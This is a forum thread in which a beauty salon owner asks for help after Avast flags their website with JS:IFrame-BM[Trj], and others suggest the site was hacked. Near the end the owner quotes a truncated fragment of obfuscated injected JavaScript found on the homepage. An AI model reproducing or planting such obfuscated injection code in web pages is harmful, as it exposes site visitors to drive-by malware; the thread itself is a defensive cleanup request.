Need help urgently!!! Avast blocks my business website

I run a beauty salon business and lately our webpage has been made inaccessible due to some Infection: JS:IFrame-BM[Trj].

Other antiviruses also block our page. It doesn’t matter from what pc I try to access my page(I tried 4) I get the same result.

This seems to have happened all of a sudden without me doing any changes(that I recall of). I attach a pic of the files that avast detected when I did an offline scan of my ftp files. I removed the links from my homepage that connect to the alleged infected files but avast still blocks my site. Any other temporary solution?
I removed the folders with said files but avast still blocks my site.

I would greatly appreciate if anyone could help me here. We lose lots of customers every day as a result.

SOS!!!

Kind Regards
Jack Morisson

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?

Check here how to clean and make a website secure.

The vast majority of malware today is distributed over the web, mostly by means of hacked (otherwise legitimate) sites. The attacker usually injects malicious some scripts into some (or all) pages on the site, waiting for an unsuspecting user to visit the site and possible infect his/her machine.

And this is where avast’s detection capabilities really excel. Its abilities to detect these web-based malicious scripts are second to none, and thanks to the Web Shield and Script Blocking providers, they are used exactly when needed, doing an excellent job stopping the web-based malware right on the entry point.

Its an IFrame (I guess).

Thanks for that link. Am reading it now. I am not sure if my site got hacked or not.

Will try to see if some of my homepage code is altered. Should I check every single page?

I found the following code which I don’t remember adding:

Sorry superman, I’m not an expert on cleaning.

Other pages work. Only my homepage and blog doesn’t want to work.

I found this dodgy code: ar=“Aw’zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[."ofbvdt/”;try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2=

any idea what it is? After removing it avast is quiet now